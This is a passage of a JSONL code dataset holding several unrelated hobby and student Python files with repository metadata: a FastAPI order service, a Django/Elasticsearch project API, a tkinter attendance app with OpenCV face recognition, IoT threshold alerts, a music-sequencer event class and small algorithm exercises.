count_center_inlier(center, X, img_VU)\n\n if ic > best_ic:\n best_ic = ic\n best_model = center\n if ic > goal_inliers and stop_at_goal:\n break\n return best_model\n\n\ndef count_center_inlier(center, X, img_VU):\n normal_vector = np.subtract(img_VU, np.transpose(center))\n normal_vector = np.reshape(normal_vector, (normal_vector.shape[0], 1, 2))\n X = np.reshape(X, (X.shape[0], 2, 1))\n err = np.reshape(np.einsum('ipq,iqr->ipr', normal_vector, X), (X.shape[0]))\n # np.where returns a tuple of index arrays; count the entries of the first one\n ic = len(np.where(np.abs(err) < 10)[0])\n print(ic)\n return ic","repo_name":"zhangqiuhao/Unsupervised_flow","sub_path":"Unflow/src/evaluation_funtion.py","file_name":"evaluation_funtion.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14877065155","text":"import argparse\n\nimport netaddr\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Merge IP addresses into the smallest possible list of CIDRs.')\n parser.add_argument('--source', nargs='?', type=argparse.FileType('r'), required=True, help='Source file path')\n args = parser.parse_args()\n\n for addr in netaddr.cidr_merge(args.source.readlines()):\n print(addr)\n","repo_name":"lord-alfred/ipranges","sub_path":"utils/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"} +{"seq_id":"22382202772","text":"from os import system\nfrom time import sleep\nfrom classes import *\n\n\"\"\"\nAssociation: making classes talk to each other\n\"\"\"\n\nif __name__ == \"__main__\":\n system(\"cls\")\n\n def linha():\n print(\"-=\" * 20)\n\n linha()\n print(\"Associação\".center(40))\n linha()\n\n escritor = Escritor(\"Rodrigo\")\n caneta = Caneta(\"BIC\")\n maquina = MaquinaDeEscrever()\n\n escritor.ferramenta = caneta\n escritor.ferramenta.escrever()\n\n # opcoes = [\"Caneta\", \"Máquina de Escrever\"]\n # while True:\n # system(\"cls\")\n # linha()\n # for index, opcao in enumerate(opcoes):\n # print(index+1, opcao)\n # linha()\n \n # ferramenta_a_ser_usada = int(input(\"Which tool do you want to use? 
\"))-1\n\n # escritor.ferramenta = caneta if ferramenta_a_ser_usada == 0 else maquina\n # escritor.usar_ferramenta()\n # sleep(1)\n","repo_name":"rodrigobarbonifilho/Python","sub_path":"Python POO/Otávio Miranda/Aula 07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32336658162","text":"import sys\r\nsys.setrecursionlimit(10**6)\r\n\r\ndef solution(li, x, y):\r\n dx = [-1, -1, -1, 0, 0, 0, 1, 1, 1]\r\n dy = [-1, 0, 1, -1, 0, 1, -1, 0, 1]\r\n\r\n for i in range(9):\r\n mx = x + dx[i]\r\n my = y + dy[i]\r\n if 0 <= mx < h and 0 <= my < w:\r\n if li[mx][my] == 1:\r\n li[mx][my] = 0\r\n solution(li, mx, my)\r\n\r\n\r\nwhile 1:\r\n w, h = map(int, input().split())\r\n if w == h == 0:\r\n break\r\n arr = [list(map(int, input().split())) for _ in range(h)]\r\n cnt = 0\r\n for i in range(h):\r\n for j in range(w):\r\n if arr[i][j] == 1:\r\n cnt += 1\r\n solution(arr, i, j)\r\n\r\n print(cnt)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/4963.py","file_name":"4963.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11040102955","text":"import tkinter as tk\nimport execute_api.list_class as lc\nimport execute_api.list_attendance as la\nimport execute_api.get_student_info as gsti\nimport cv2\nimport numpy as np\nimport os\nfrom PIL import Image\nimport execute_api.refresh as rf\nSAVE_FOLDER = os.path.join(os.path.abspath(\n os.path.dirname(os.path.dirname(__file__))), 'hello_n/static/files')\n\n\ndef get_profile(access_token, student_id):\n try:\n response = gsti.get_student_info(access_token, student_id)\n if response['status'] == 200:\n email = response['data']['email']\n id = response['data']['id']\n name = response['data']['name']\n student_id = response['data']['student_id']\n return id, name, student_id, email\n else:\n return None, None, None, None\n except:\n return None, None, None, None\n\n\nclass DetailClassPage(tk.Frame):\n\n def __init__(self, parent, controller, at=None, rt=None, datas=[]):\n tk.Frame.__init__(self, parent)\n self.container = parent\n self.controller = controller\n self.at = at\n self.rt = rt\n self.datas = datas\n self.class_id = datas[0]['class_id']\n self.class_datas = []\n self.init_UI()\n self.draw_table()\n\n self.oid = ''\n self.email = ''\n self.student_id = ''\n self.name = ''\n\n def init_UI(self):\n self.label_date = tk.Label(self, text=\"Date\")\n self.entry_date = tk.Entry(self, width=20, bg=\"light yellow\")\n self.label_notice = tk.Label(self, text=\"\", bg=\"orange\")\n\n button_home = tk.Button(\n self, text=\"BACK\", command=lambda: self.controller.show_frame(self.container, \"ClassPage\", self.at, self.rt))\n button_home.configure(width=10, bg=\"orange\")\n\n button_all = tk.Button(\n self, text=\"ALL\", command=self.list_attendance_all)\n button_all.configure(width=10, bg=\"lightblue\")\n\n button_absent = tk.Button(\n self, text=\"ABSENT\", command=self.list_attendance_absent)\n button_absent.configure(width=10, bg=\"lightblue\")\n\n button_attendance = tk.Button(\n self, text=\"PRESENT\", command=self.list_attendance_attendance)\n button_attendance.configure(width=10, bg=\"lightblue\")\n\n button_add_student = tk.Button(\n self, text=\"ADD STUDENT\", command=lambda: self.controller.show_frame(\n self.container,\n \"AddStudentClassPage\",\n self.at,\n self.rt,\n [{\"class_id\": self.class_id}]\n )\n 
)\n button_add_student.configure(width=10, bg=\"orange\")\n\n button_take_attendance = tk.Button(\n self, text=\"TAKE ATTENDANCE\", command=self.take_attendance)\n button_take_attendance.configure(width=10, bg=\"orange\")\n\n # button_home.pack()\n # button_all.pack()\n # button_absent.pack()\n # button_attendance.pack()\n # self.label_date.pack()\n # self.entry_date.pack()\n # self.label_notice.pack()\n\n button_home.grid(row=0, column=0, sticky=tk.NSEW)\n button_take_attendance.grid(row=0, column=1, sticky=tk.NSEW)\n button_add_student.grid(row=0, column=2, sticky=tk.NSEW)\n button_all.grid(row=1, column=0, sticky=tk.NSEW)\n button_absent.grid(row=1, column=1, sticky=tk.NSEW)\n button_attendance.grid(row=1, column=2, sticky=tk.NSEW)\n self.label_date.grid(row=4, column=1, sticky=tk.NSEW)\n self.entry_date.grid(row=5, column=1, sticky=tk.NSEW)\n self.label_notice.grid(row=6, column=1)\n\n def list_attendance_all(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"all\"\n date = self.entry_date.get()\n if not date and state != \"all\":\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def list_attendance_absent(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"absent\"\n date = self.entry_date.get()\n if not date:\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def list_attendance_attendance(self):\n self.check_current_token()\n\n self.label_notice['text'] = \"\"\n # check date\n state = \"attendance\"\n date = self.entry_date.get()\n if not date:\n self.label_notice['text'] = \"Please enter date\"\n return\n date = date+\"T00:00:00.00000\"\n try:\n response = la.exec_list_attendance(\n self.at, self.class_id, state, date)\n if response['status'] == 200:\n # tao bang\n # print(response['data'])\n self.del_table()\n self.class_datas = response['data']\n print(self.class_datas)\n self.draw_table()\n except:\n pass\n\n def del_table(self):\n\n datas = self.class_datas\n height = len(datas)\n width = 3\n for i in range(8, 8+height): # Rows\n for j in range(width): # Columns\n self.nametowidget(str(i-8)+\"-\"+str(j)).destroy()\n\n def draw_table(self):\n self.check_current_token()\n\n columns = [\"Email\", \"Name\", \"Student Id\"]\n for i in range(len(columns)):\n b = tk.Entry(self, width=44, bg='LightSteelBlue', fg='Black',\n font=('Arial', 16, 'bold'))\n b.grid(row=7, column=i)\n b.insert(tk.END, columns[i])\n datas = self.class_datas\n height = len(datas)\n width = 3\n for i in range(8, 8+height): # Rows\n for j in range(width): # Columns\n b = tk.Entry(self, text=\"\", name=str(i-8)+\"-\"+str(j), width=44, bg='White', fg='Black',\n font=('Arial', 16))\n b.grid(row=i, column=j)\n if j == 0:\n b.insert(tk.END, datas[i-8]['email'])\n elif j == 1:\n b.insert(tk.END, datas[i-8]['name'])\n elif j == 2:\n b.insert(tk.END, datas[i-8]['student_id'])\n\n def 
take_attendance(self):\n \n face_cascade = cv2.CascadeClassifier(\n cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read(SAVE_FOLDER+'/me.yml')\n cap = cv2.VideoCapture(0)\n fontface = cv2.FONT_HERSHEY_SIMPLEX\n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 225, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n student_id, confidence = recognizer.predict(roi_gray)\n if confidence < 40:\n id, name, student_id, email = get_profile(self.at,student_id)\n self.oid = id\n self.email = email\n self.student_id = student_id\n self.name = name\n if id and name and email and student_id:\n cv2.putText(frame, name, (x+10, y+h+30),\n fontface, 1, (0, 255, 0), 2)\n cv2.putText(frame, student_id, (x+10, y+h+60),\n fontface, 1, (0, 255, 0), 2)\n cv2.putText(frame, email, (x+10, y+h+90),\n fontface, 1, (0, 255, 0), 2)\n else:\n cv2.putText(frame, \"Unknown\", (x+10, y+h+30),\n fontface, 1, (0, 0, 225), 2)\n cv2.imshow('DETECTING FACE', frame)\n if cv2.waitKey(1) == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n if self.oid and self.name and self.student_id and self.email:\n self.controller.show_frame(\n self.container,\n \"TakeAttendancePage\",\n self.at,\n self.rt,\n [\n {\n \"class_id\":self.class_id,\n \"student_oid\":self.oid,\n \"name\":self.name,\n \"email\":self.email,\n \"student_id\": self.student_id\n }\n ]\n )\n else:\n return\n def check_current_token(self):\n new_at,new_rt,status= rf.check_token(self.at,self.rt)\n if not new_at and not new_rt and not status:\n pass\n elif new_at and new_rt and not status:\n self.at = new_at\n self.rt = new_rt\n elif not new_at and not new_rt and status=='restart':\n self.controller.show_frame(self.container,\"StartPage\",self.at,self.rt)\n\n","repo_name":"bezleen/attendance-app-client","sub_path":"detail_class_page.py","file_name":"detail_class_page.py","file_ext":"py","file_size_in_byte":9930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73285627689","text":"from fastapi import FastAPI, HTTPException, Depends\nimport models\nimport schemas\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(bind = engine)\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n \n#Order Endpoints\n@app.post('/order/')\nasync def create_order(order: schemas.OrderBase, db: Session = Depends(get_db)):\n db_order = models.Order(time_stamp = order.time_stamp)\n db_address = models.Address(city = order.address.city, country = order.address.country, zipcode = order.address.zipcode, order_id = db_order.id)\n db.add(db_address)\n itemids = [i.id for i in db.query(models.Product.id)]\n prodtotal = 0.0 \n print(itemids)\n for item in order.items:\n db_item = models.Items(productid = item.productid, boughtqty = item.boughtqty, order_id = db_order.id)\n if db_item.productid not in itemids:\n raise HTTPException(status_code = 404, detail = \"Item of given ID not in Products!\")\n val = db.query(models.Product).filter(models.Product.id == db_item.productid).first()\n if db_item.boughtqty > val.quantity:\n raise HTTPException(status_code = 400, detail = \"Number of products exceeds stock!\")\n prodtotal += val.price * db_item.boughtqty\n print(prodtotal)\n 
db.add(db_item)\n db_order.total = prodtotal\n db.add(db_order)\n db.commit()\n\n\n@app.get('/order/')\nasync def get_all_orders(db: Session = Depends(get_db), skip: int = 0, limit: int = 5):\n result = db.query(models.Order).offset(skip).limit(limit).all()\n if not result:\n raise HTTPException(status_code = 404, detail = \"No Orders in system!\")\n return result\n\n@app.get('/order/{order_id}')\nasync def get_order_by_id(order_id: int, db: Session = Depends(get_db)):\n result = db.query(models.Order).filter(models.Order.id == order_id).first()\n if not result:\n raise HTTPException(status_code = 404, detail = \"Order of given ID not found!\")\n return result\n\n\n#Address Endpoints\n@app.get('/address/{order_id}')\nasync def get_address_by_id(order_id: int, db: Session = Depends(get_db)):\n result = db.query(models.Address).filter(models.Order.id == order_id).first()\n return result\n\n\n#Product Endpoints\n@app.post('/product/')\nasync def create_product(product: schemas.ProductBase, db: Session = Depends(get_db)):\n db_product = models.Product(name = product.name, price = product.price, quantity = product.quantity)\n db.add(db_product)\n db.commit()\n db.refresh(db_product)\n\n@app.get('/product/')\nasync def get_all_products(db: Session = Depends(get_db), skip: int = 0, limit: int = 5):\n result = db.query(models.Product).offset(skip).limit(limit).all()\n if not result:\n raise HTTPException(status_code = 404, detail = \"No Products in system!\")\n return result\n\n@app.put('/product/{product_id}')\nasync def update_product(product_id: int, product: schemas.ProductBase, db: Session = Depends(get_db)):\n result = db.query(models.Product).filter(models.Product.id == product_id).first()\n result.name = product.name\n result.price = product.price\n result.quantity = product.quantity\n db.commit()\n db.refresh(result)\n ","repo_name":"Kausar-De/CosmoCloud-Task-Kausar-De","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6625078536","text":"import pandas as pd\nimport numpy as np\ndef above_threshold(df, column, threshold):\n '''\n Function to check if the given column is above the threshold\n '''\n if df[column].max() > threshold:\n alert_msg = f\"{column} is above the threshold of {threshold}\"\n return alert_msg\n else:\n return None\ndef below_threshold(df, column, threshold):\n '''\n Function to check if the given column is below the threshold\n '''\n if df[column].min() < threshold:\n alert_msg = f\"{column} is below the threshold of {threshold}\"\n return alert_msg\n else:\n return None\ndef continuous_threshold(df, column, threshold, duration):\n '''\n Function to check if the given column is above the threshold continuously for the given duration\n '''\n continuous_count = 0\n for value in df[column]:\n if value > threshold:\n continuous_count += 1\n else:\n continuous_count = 0\n if continuous_count >= duration:\n alert_msg = f\"{column} is continuously above the threshold of {threshold} for {duration} minutes\"\n return alert_msg\n return None\n# Example usage\nwind_turbine_data = pd.DataFrame({'temperature_100': [30, 25, 30],\n 'pressure_100': [2000, 1100, 1200],\n 'wind_speed_100': [30, 15, 20],\n 'power_output_100': [1500, 2000, 2500]})\n# Alert for wind speed above 25 m/s\nalert1 = above_threshold(wind_turbine_data, 'wind_speed_100', 25)\nif alert1:\n print(alert1)\n# Alert for power output below 1000 kW\nalert2 = 
below_threshold(wind_turbine_data, 'power_output_100', 1000)\nif alert2:\n print(alert2)\n# Alert for wind speed continuously above 20 m/s for 5 minutes\nalert3 = continuous_threshold(wind_turbine_data, 'wind_speed_100', 20, 5)\nif alert3:\n print(alert3)\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 08/code/901_8.1.py","file_name":"901_8.1.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32415953986","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotAllowed, HttpResponseBadRequest\nimport re\nfrom elasticsearch_dsl.query import MultiMatch, Match\n\nimport os\nimport logging\nimport json\nfrom datetime import datetime, date, time\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\n\nclient = Elasticsearch()\n\n# Create your views here.\nlogger = logging.getLogger('restapp')\n\n\ndef createproject(request):\n ''' it handles the json request and save the json file to Project.txt'''\n print(request.content_type)\n if request.content_type == 'application/json':\n logger.info(\"in post method of createproject\")\n try:\n data = json.loads(request.body.decode(\"utf-8\"))\n except ValueError:\n logger.info(\"invalid request. bad json sent\")\n return HttpResponseBadRequest('invalid request.. ')\n\n id = data['id']\n try:\n id = int(id)\n except ValueError:\n logger.info(\"invalid request. project id should be of type int\")\n return HttpResponseBadRequest('invalid request')\n projectName = data['projectName']\n projectCost = data['projectCost']\n projectUrl = data['projectUrl']\n creationDate = data['creationDate']\n\n expiryDate = data['expiryDate ']\n targetCountries = data['targetCountries']\n targetKeys = data['targetKeys']\n for target in targetKeys:\n try:\n int(target['number'])\n except ValueError:\n logger.info(\"invalid request. project id should be of type int\")\n return HttpResponseBadRequest('invalid request')\n logger.info(\"Complete ->checking parameter\")\n pwd = os.path.dirname(__file__)\n with open(pwd + '/Project.txt', 'a') as data_file: # appending data to the file\n data_file.write(json.dumps(data))\n data_file.write(\"\\n\")\n results.append(data)\n logger.info(\"Complete -> Writing value to file\")\n\n logger.info(\"campaign is successfully created\")\n\n return HttpResponse(\"campaign is successfully created\")\n else:\n if request.GET:\n logger.info(\"invalid request. using get type\")\n else:\n if request.content_type != 'application/json':\n logger.info(\"invalid request. 
request.content type is not json\")\n\n return HttpResponseNotAllowed('Only POST method with content-type json allowed here')\n\n\ndef requestproject(request):\n ''' sends the project based on the parameter it receives'''\n logger.info(\"inside requestproject\")\n documentAddFromFile()\n if len(request.GET) == 0:\n s = Search(using=client, index=\"restapp\").sort('-projectCost')\n response = s.execute()\n return elasticResponseGeneratePrintOne(response)\n\n if True:\n for k, v in request.GET.items():\n print (k)\n print (v)\n s = Search(using=client, index=\"restapp\")\n if k == 'id':\n\n s = s.filter(\"term\", id=v)\n response = s.execute()\n return elasticResponseGenerate(response)\n elif k == 'country':\n s = s.query(\"match\", targetCountries=v)\n response = s.execute()\n return elasticResponseGenerate(response)\n elif k == 'number':\n args = {\n \"targetKeys.number\": v\n }\n s.filter(\"term\", **args)\n response = s.execute()\n return elasticResponseGenerate(response)\n\n return HttpResponse(\"no project found\")\n\n\ndef documentAddFromFile():\n resultList = []\n pwd = os.path.dirname(__file__)\n with open(pwd + '/Project.txt', 'r') as data_file:\n logger.info(\"Complete -> Writing value to file\")\n # client.bulk(index='restapp', body = data_file, refresh = True)\n for line in data_file:\n # client.index(index='restapp', doc_type= 'project', body = line)\n record = json.loads(line)\n resultList.append(record)\n return resultList\n\n\ndef elasticResponseGenerate(response):\n ''' sends the response generated from the elastic search'''\n\n if response['hits']['total'] > 0:\n records = (response['hits']['hits'])\n print(len(records))\n res = ''\n\n for d in records:\n print(d['_source']['expiryDate '])\n print(d['_source'].to_dict())\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(d['_source']['expiryDate '], \"%m%d%Y %H:%M:%S\")\n\n if len((d['_source']['projectUrl']).strip()) == 0:\n continue;\n if dateofrecord < currentdate:\n continue;\n res = res + json.dumps(d['_source'].to_dict(), indent=7) + '\\n'\n\n if len(res.strip()) == 0:\n return HttpResponse(\"no project found\")\n\n return HttpResponse(res, content_type=\"application/json\")\n\n else:\n return HttpResponse(\"no project found\")\n\n\ndef elasticResponseGeneratePrintOne(response):\n if response['hits']['total'] > 0:\n d = (response['hits']['hits'][0]['_source'])\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(d['expiryDate '], \"%m%d%Y %H:%M:%S\")\n if len((d['projectUrl']).strip()) == 0:\n return HttpResponse(\"no project found\")\n if dateofrecord < currentdate:\n return HttpResponse(\"no project found\")\n return HttpResponse(json.dumps(d.to_dict(), indent=7), content_type=\"application/json\")\n else:\n return HttpResponse(\"no project found\")\n\n\ndef getproject(request):\n ''' implementation using regular datastructure'''\n list = results\n print(\"------------\")\n print(len(list))\n\n if len(request.GET) == 0: # when no parameters are passed then return the project with highest cost\n map = {}\n logger.info(\"request with no parameter.\")\n\n max = 0\n temp = {}\n for l in list:\n if l['projectCost'] > max:\n temp = l\n\n return HttpResponse(json.dumps(temp, indent=7), content_type=\"application/json\")\n\n if 'id' in request.GET: # if id is included then just find the corresponding id and return it\n for l in list:\n val = int(l['id'])\n logger.info(\"request with id parameter.\")\n\n parameterid = int(request.GET['id'])\n if val == parameterid:\n return 
HttpResponse(json.dumps(l, indent=7), content_type=\"application/json\")\n\n return HttpResponse(\"no project found\")\n\n res = ''\n for l in list: # if id is not present then find the project based on all the parameters passed\n count = 0\n if 'country' in request.GET:\n if request.GET['country'] in l['targetCountries']:\n if checkvalid(l):\n count = count + 1\n if 'number' in request.GET:\n for key in l['targetKeys']:\n if int(key['number']) == int(request.GET['number']):\n if checkvalid(l):\n count = count + 1\n break\n if 'keyword' in request.GET:\n for key in l['targetKeys']:\n if key['keyword'] == request.GET['keyword']:\n if checkvalid(l):\n count = count + 1\n break\n if count == len(request.GET): # checks if the record satisfies all the parameters or not\n res = res + json.dumps(l, indent=7)\n\n if len(res.strip()) != 0:\n return HttpResponse(res, content_type=\"application/json\")\n\n return HttpResponse(\"no project found\")\n\n\ndef checkvalid(l): # utility function that checks expiryDate and projectUrl is valid or not\n currentdate = datetime.now()\n dateofrecord = datetime.strptime(l['expiryDate '], \"%m%d%Y %H:%M:%S\")\n if len((l['projectUrl']).strip()) == 0:\n return False\n if dateofrecord < currentdate:\n return False\n return True\n\n\nresults = documentAddFromFile() # this is executed only once. It reads all the values from the file once .\n","repo_name":"cshekhar1337/unity_tech","sub_path":"restapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22505953568","text":"students = {}\ncounter = {}\nwhile True:\n command = input()\n\n if command == \"exam finished\":\n break\n\n info = command.split(\"-\")\n\n if len(info) == 3:\n name = info[0]\n language = info[1]\n points = int(info[2])\n\n if name not in students.keys():\n students[name] = points\n else:\n if students[name] < points:\n students[name] = points\n\n if language not in counter.keys():\n counter[language] = 0\n counter[language] += 1\n\n elif len(info) == 2:\n name = info[0]\n\n if name in students.keys():\n del students[name]\n\nprint(\"Results:\")\nfor name, points in students.items():\n print(f\"{name} | {points}\")\nprint(\"Submissions:\")\nfor language, points in counter.items():\n print(f\"{language} - {points}\")\n\n\n","repo_name":"BlackRock17/Fundamentals_Python_2023","sub_path":"Dictionary_Exercise/SoftUni_Exam_Result.py","file_name":"SoftUni_Exam_Result.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34655349396","text":"import numpy as np\nimport pandas as pd\nimport joblib\nfrom os.path import join, dirname, realpath\n\nLE_EXERCISEANGINA_PATH = join(dirname(realpath(__file__)), '../models/label_encoder_exerciseangina.joblib')\nLE_SEX_PATH = join(dirname(realpath(__file__)), '../models/label_encoder_sex.joblib')\nOHE_PATH = join(dirname(realpath(__file__)), '../models/one_hot_encoder.joblib')\n\ndef feature_engineering(data):\n data = label_encoding(data)\n data = one_hot_encoding(data)\n\n return data\n\ndef label_encoding(data):\n label_encoder_exerciseangina = joblib.load(LE_EXERCISEANGINA_PATH)\n label_encoder_sex = joblib.load(LE_SEX_PATH)\n\n data['exerciseangina'] = label_encoder_exerciseangina.transform(data['exerciseangina'])\n data['sex'] = label_encoder_sex.transform(data['sex'])\n\n return data\n\ndef one_hot_encoding(data):\n 
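The expiry/URL validity test in the views above is written out three times (`elasticResponseGenerate`, `elasticResponseGeneratePrintOne`, `checkvalid`), always with the same quirks: the key is literally `'expiryDate '` with a trailing space, and the date format is `%m%d%Y`. A single shared predicate keeps the call sites consistent:

```python
from datetime import datetime

def is_live_project(record: dict) -> bool:
    """Shared validity check: non-empty projectUrl and a future expiry date.
    Note the trailing space in 'expiryDate ' -- it is part of the stored key."""
    if not record.get('projectUrl', '').strip():
        return False
    expiry = datetime.strptime(record['expiryDate '], "%m%d%Y %H:%M:%S")
    return expiry >= datetime.now()

print(is_live_project({'projectUrl': 'http://x', 'expiryDate ': '12312030 00:00:00'}))  # True
```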
categorical_column_to_one_hot_encode = ['st_slope', 'restingecg', 'chestpaintype']\n\n    one_hot_encoder = joblib.load(OHE_PATH)\n\n    # encode the actual categorical columns of the input frame\n    feature_arr = one_hot_encoder.transform(data[categorical_column_to_one_hot_encode]).toarray()\n    feature_labels = one_hot_encoder.categories_\n\n    feature_labels = list(np.concatenate(feature_labels))\n\n    features = pd.DataFrame(feature_arr, columns=feature_labels)\n\n    data.drop(columns=categorical_column_to_one_hot_encode, inplace=True)\n\n    data = pd.concat([data, features], axis=1)\n\n    return data\n","repo_name":"christhopermarcelino/heart-failure-classification","sub_path":"services/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30552130884","text":"# ------------------------------------------------------------------\n# Warp Sequencer\n# (C) 2020 Michael DeHaan & contributors\n# Apache2 Licensed\n# ------------------------------------------------------------------\n\n# an event represents starting or stopping a note, and some associated\n# data so the program can handle the note and other processing in context.\n# for instance the scale is needed for processing deferred events.\n\nimport copy\n\nfrom .base import BaseObject\n\nNOTE_ON = 1\nNOTE_OFF = 0\n\nclass Event(object):\n\n\n    __slots__ = [ 'type', 'note', 'time', 'on_event', 'off_event', 'scale' ]\n\n    from . note import Note\n\n    def __init__(self, type=None, note=None, time=None, on_event=None, off_event=None, scale=None):\n        self.type = type\n        self.note = note\n        self.time = time\n        self.on_event = on_event\n        self.off_event = off_event\n        self.scale = scale\n\n    def __repr__(self):\n        return \"Event<%s, %s, %s>\" % (self.note, self.type, self.time)\n\n    def copy(self):\n        return Event(\n            type = self.type,\n            note = self.note.copy(), # could be a Chord! 
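For the `feature_engineering` record above, a minimal sketch of the fit-time counterpart the loader assumes: the encoder is fitted on the same three columns, so `categories_` comes back in column order and `np.concatenate` yields output labels that line up with the transformed array. The column values here are illustrative, not taken from the repository.

```python
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder

train = pd.DataFrame({
    'st_slope': ['Up', 'Flat'],
    'restingecg': ['Normal', 'LVH'],
    'chestpaintype': ['ASY', 'ATA'],
})
enc = OneHotEncoder(handle_unknown='ignore').fit(train)
arr = enc.transform(train).toarray()            # one output row per input row
labels = list(np.concatenate(enc.categories_))  # same order as the columns
print(pd.DataFrame(arr, columns=labels))
```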
Be careful.\n time = self.time,\n on_event = self.on_event,\n off_event = self.off_event\n )\n","repo_name":"simianterminal/warpseq","sub_path":"warpseq/model/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"69896009129","text":"from typing import List\n\nfrom src.models.chord import Chord\n\n\ndef extract_chords(song) -> List[Chord]:\n song_chords = []\n\n for chordMeasure in song['ChordsMeasures']:\n for chordData in chordMeasure['Chords']:\n chord = Chord.create_from_json(chordData)\n\n # Group chords that are exactly the same\n if len(song_chords) > 0 and str(chord) == str(song_chords[-1]):\n continue\n\n song_chords.append(chord)\n\n return song_chords","repo_name":"arsenaultk9/chord2vec","sub_path":"src/chords_extractor.py","file_name":"chords_extractor.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33915042500","text":"import cv2 as cv\r\nimport argparse\r\nimport numpy\r\n\r\nclass FaceRecognition():\r\n parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.')\r\n parser.add_argument('--face_cascade', help='Path to face cascade.', default='data/haarcascades/haarcascade_frontalface_alt.xml')\r\n parser.add_argument('--eyes_cascade', help='Path to eyes cascade.', default='data/haarcascades/haarcascade_eye_tree_eyeglasses.xml')\r\n parser.add_argument('--camera', help='Camera divide number.', type=int, default=0)\r\n args = parser.parse_args()\r\n face_cascade_name = args.face_cascade\r\n eyes_cascade_name = args.eyes_cascade\r\n \r\n face_cascade = cv.CascadeClassifier()\r\n eyes_cascade = cv.CascadeClassifier()\r\n \r\n def __init__(self):\r\n \r\n if not face_cascade.load(cv.samples.findFile(face_cascade_name)):\r\n print('--(!)Error loading face cascade')\r\n exit(0)\r\n if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)):\r\n print('--(!)Error loading eyes cascade')\r\n exit(0)\r\n \r\n if not cap.isOpened:\r\n print('--(!)Error opening video capture')\r\n exit(0)\r\n \r\n self.camera_device = args.camera\r\n self.capture = cv.VideoCapture(self.camera_device)\r\n \r\n while True:\r\n self.ret, self.frame = self.capture.read()\r\n if frame is None:\r\n print('--(!) 
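The adjacent-duplicate check in `extract_chords` above (`str(chord) == str(song_chords[-1])`) is a run-length collapse; `itertools.groupby` expresses it directly, keyed on the same string representation:

```python
from itertools import groupby

def dedupe_adjacent(chords):
    # groupby bundles equal *consecutive* keys; keep the first of each run
    return [next(group) for _, group in groupby(chords, key=str)]

print(dedupe_adjacent(['Am', 'Am', 'F', 'F', 'F', 'C', 'Am']))  # ['Am', 'F', 'C', 'Am']
```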
